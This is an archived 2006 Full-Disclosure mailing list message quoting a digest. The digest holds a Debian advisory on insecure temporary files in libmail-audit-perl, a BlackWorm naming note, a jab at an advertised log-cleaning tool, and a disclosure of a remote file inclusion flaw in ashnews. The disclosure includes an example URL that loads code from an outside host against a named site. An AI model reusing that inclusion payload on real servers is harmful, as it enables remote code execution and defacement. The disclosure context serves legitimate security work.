Full Disclosure mailing list archives
RE: Full-disclosure Digest, Vol 11, Issue 71
From: "Tom" <kermesz () o2 pl>
Date: Tue, 31 Jan 2006 17:56:59 +0100
-----Original Message----- From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk]On Behalf Of full-disclosure-request () lists grok org uk Sent: Tuesday, January 31, 2006 1:00 PM To: full-disclosure () lists grok org uk Subject: Full-disclosure Digest, Vol 11, Issue 71 Send Full-Disclosure mailing list submissions to full-disclosure () lists grok org uk To subscribe or unsubscribe via the World Wide Web, visit https://lists.grok.org.uk/mailman/listinfo/full-disclosure or, via email, send a message with subject or body 'help' to full-disclosure-request () lists grok org uk You can reach the person managing the list at full-disclosure-owner () lists grok org uk When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..." Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you. Today's Topics: 1. Re: Invi LogWripper (besugo () naida org) 2. Re: BlackWorm naming confusing [CME entry now available] (houser () hush com) 3. [SECURITY] [DSA 960-1] New libmail-audit-perl packages fix insecure temporary file use (Martin Schulze) 4. Re: ashnews Cross-Site Scripting Vulnerability (DanB-FD) ---------------------------------------------------------------------- Message: 1 Date: Tue, 31 Jan 2006 07:22:03 +0000 (GMT) From: besugo () naida org Subject: Re: [Full-disclosure] Invi LogWripper To: undisclosed-recipients:; Message-ID: <20060131072203.840BA776 () lists grok org uk> devy wrote:
My powerful log cleaner -> http://colander.altervista.org/wt.c
system("mv temp /var/log/xferlog"); what lame code. u'r even less than a script-kiddie. ------------------------------ Message: 2 Date: Tue, 31 Jan 2006 10:45:12 +0100 From: <houser () hush com> Subject: [Full-disclosure] Re: BlackWorm naming confusing [CME entry now available] To: <full-disclosure () lists grok org uk> Message-ID: <200601310945.k0V9jCbe064911 () mailserver3 hushmail com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Seems to be Microsoft has an Advisory up http://www.microsoft.com/technet/security/advisory/904420.mspx Here it is callede Win32/Mywife.E@mm Houser -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkUEARECAAYFAkPfMawACgkQ/wWrZLOJU0JSagCWJ7zkk2gP4h+k0jiAf0RtfcgWtACf V6lpx15O4OC1nNAJLhypBb5GoaI= =gBzk -----END PGP SIGNATURE----- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ------------------------------ Message: 3 Date: Tue, 31 Jan 2006 11:14:37 +0100 (CET) From: joey () infodrom org (Martin Schulze) Subject: [Full-disclosure] [SECURITY] [DSA 960-1] New libmail-audit-perl packages fix insecure temporary file use To: debian-security-announce () lists debian org (Debian Security Announcements) Message-ID: <m1F3sWz-000ofRC () finlandia Infodrom North DE> Content-Type: text/plain; charset=iso-8859-1 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 960-1 security () debian org http://www.debian.org/security/ Martin Schulze January 31st, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : libmail-audit-perl Vulnerability : insecure temporay file createion Problem type : local Debian-specific: no CVE ID : CVE-2005-4536 Debian Bug : 344029 Niko Tyni discovered that the Mail::Audit module, a Perl library for creating simple mail filters, logs to a temporary file with a predictable filename in an insecure fashion when logging is turned on, which is not the case by default. For the old stable distribution (woody) these problems have been fixed in version 2.0-4woody1. For the stable distribution (sarge) these problems have been fixed in version 2.1-5sarge1. For the unstable distribution (sid) these problems have been fixed in version 2.1-5sarge1. We recommend that you upgrade your libmail-audit-perl package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail -audit-perl_2.0-4woody1.dsc Size/MD5 checksum: 663 f1cc82dae98e2a7ae42e29e757797b41 http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail -audit-perl_2.0-4woody1.diff.gz Size/MD5 checksum: 5548 64f85349649a968db3493fa8ba27aea1 http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail -audit-perl_2.0.orig.tar.gz Size/MD5 checksum: 12526 3bc6043611f0fabdd856498e25bd48f6 Architecture independent components: http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail -audit-perl_2.0-4woody1_all.deb Size/MD5 checksum: 29446 d7e0e9264e08f04777eb05f543956498 http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/mail-au dit-tools_2.0-4woody1_all.deb Size/MD5 checksum: 8840 f97415f72fcf1806b18e9e059ae5c6e0 Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail -audit-perl_2.1-5sarge1.dsc Size/MD5 checksum: 786 766a0a1d409fb6a55d0fd28cfeb9139d http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail -audit-perl_2.1-5sarge1.diff.gz Size/MD5 checksum: 4227 48ed975c7c87db86bcafde084cde94a5 http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail -audit-perl_2.1.orig.tar.gz Size/MD5 checksum: 21669 b52b1142fa9ed7d847c531186f913ea6 Architecture independent components: http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail -audit-perl_2.1-5sarge1_all.deb Size/MD5 checksum: 41836 38128df51141ba4bd495f3d698629b52 http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/mail-au dit-tools_2.1-5sarge1_all.deb Size/MD5 checksum: 12176 1d898a6a9f2a40cad0416d5b107df3bd These files will probably be moved into the stable distribution on its next update. - -------------------------------------------------------------------------- ------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce () lists debian org Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFD3ziMW5ql+IAeqTIRAhWbAJ9TIV09mVk/cctpxkCIeTqmFC8PrQCfTN3y m05zhJ1hxUem+gIZsybGOtw= =HCnP -----END PGP SIGNATURE----- ------------------------------ Message: 4 Date: Tue, 31 Jan 2006 10:43:19 +0000 From: DanB-FD <dan-fd () f-box org> Subject: Re: [Full-disclosure] ashnews Cross-Site Scripting Vulnerability To: Dan B UK <dan-fd () f-box org> Cc: zeus olimpusklan <zeus.olimpusklan () gmail com>, full-disclosure () lists grok org uk, bugtraq () securityfocus com, admin () zone-h org, org () security nnov ru Message-ID: <43DF3F47.8010700 () f-box org> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Hi, Dan B UK wrote:
Due to the nature of the issue I am not disclosing the detail of it until the writer of the software has updated it; maybe you could have waited?? A vulnerability that allows privileges of the apache user within the limitations of how much PHP has been locked down.
Since the author of the product has got back to me with the following I think it is ok to disclose the issue now. "That is a known error. Unfortunately I have completely abondoned ashnews. In fact, I have been neglecting taking it down completely which I am going to do right now. - Derek" The issue is in the handling of the $pathtoashnews, it is not validated before being used by the script. Allowing remote or local file inclusion. eg: http://dosko.nl/news/ashnews.php?pathtoashnews=http://f-box.org/~dan/inc.inc ? ( The ? is required to make the remote server (f-box.org) ignore the string that is appended to the variable $pathtoashnews ) ( The website that is in the example above has already been defaced! ) Cheers, DanB UK. ------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ End of Full-Disclosure Digest, Vol 11, Issue 71 *********************************************** _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- RE: Full-disclosure Digest, Vol 11, Issue 71 Tom (Jan 31)